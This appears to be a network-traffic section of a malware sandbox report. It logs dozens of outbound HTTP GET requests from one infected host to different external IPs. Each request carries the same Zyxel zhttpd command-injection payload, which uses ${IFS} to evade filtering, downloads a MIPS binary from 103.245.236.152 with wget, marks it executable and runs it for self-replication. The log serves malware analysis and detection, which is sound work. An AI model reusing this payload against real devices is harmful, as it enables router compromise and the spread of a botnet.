                                            Jan 14, 2024 15:50:56.777859926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9003192.168.2.2341632213.210.158.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777884007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9004192.168.2.233394094.88.2.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777915001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9005192.168.2.2346350191.32.160.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777982950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9006192.168.2.2334256199.218.144.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778008938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9007192.168.2.2356072185.95.231.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778058052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9008192.168.2.2334024161.57.218.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778150082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9009192.168.2.236078445.244.143.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778184891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9010192.168.2.2355680147.179.208.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778227091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9011192.168.2.2355706112.36.115.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778283119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9012192.168.2.235575237.130.226.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778320074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9013192.168.2.2358324213.19.150.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778367043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9014192.168.2.2337734156.238.64.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778405905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9015192.168.2.236039246.60.70.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778482914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9016192.168.2.2342030106.92.86.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778503895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9017192.168.2.2344820150.130.0.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778554916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9018192.168.2.2334712163.192.112.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778605938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9019192.168.2.2342784128.210.209.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778635025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9020192.168.2.2344964173.11.147.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778650999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9021192.168.2.235971486.189.78.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778712988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9022192.168.2.2334476157.204.3.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778743982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9023192.168.2.2344912152.190.144.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778784990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9024192.168.2.235679093.8.130.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778834105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9025192.168.2.2350390107.220.223.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778883934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9026192.168.2.2359410186.206.230.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778914928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9027192.168.2.2342492113.226.12.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778944969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9028192.168.2.2356640193.239.27.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.778973103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9029192.168.2.235691267.1.114.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779015064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9030192.168.2.23523925.66.17.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779055119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9031192.168.2.2357186174.156.247.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779099941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9032192.168.2.235336867.59.87.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779139042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9033192.168.2.233960812.69.77.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779181957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9034192.168.2.235605265.21.173.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779237032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9035192.168.2.2341984177.238.140.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779283047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9036192.168.2.2351722206.156.125.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779313087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9037192.168.2.233873862.252.198.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779371023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9038192.168.2.234628892.178.168.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779416084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9039192.168.2.236043088.243.145.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779458046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9040192.168.2.234312813.133.56.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779474974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9041192.168.2.2352040184.222.137.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779530048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9042192.168.2.2355160219.29.65.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779566050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9043192.168.2.2347798158.112.71.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779622078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9044192.168.2.2354016176.128.236.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779640913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9045192.168.2.235242267.38.144.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779676914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9046192.168.2.233397080.218.38.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779742956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9047192.168.2.2349648100.35.29.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779797077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9048192.168.2.2349626111.182.117.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779881954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9049192.168.2.2351296194.107.108.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779885054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9050192.168.2.2347384218.71.14.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779975891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9051192.168.2.2360642155.143.105.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.779990911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9052192.168.2.2351492167.63.95.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780038118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9053192.168.2.2338490104.186.98.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780095100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9054192.168.2.2344458125.86.231.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780116081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9055192.168.2.2356568167.235.13.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780148029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9056192.168.2.235656419.223.52.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780208111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9057192.168.2.2348126170.12.33.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780246019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9058192.168.2.2334850138.42.192.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780307055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9059192.168.2.233335874.252.0.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780335903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9060192.168.2.2346180107.188.235.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780420065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9061192.168.2.235691432.94.101.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780438900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9062192.168.2.2355356134.251.142.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780504942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9063192.168.2.2346960165.221.43.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780529022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9064192.168.2.235623645.136.147.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780590057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9065192.168.2.2349924155.230.230.72443
                                            TimestampBytes transferredDirectionData
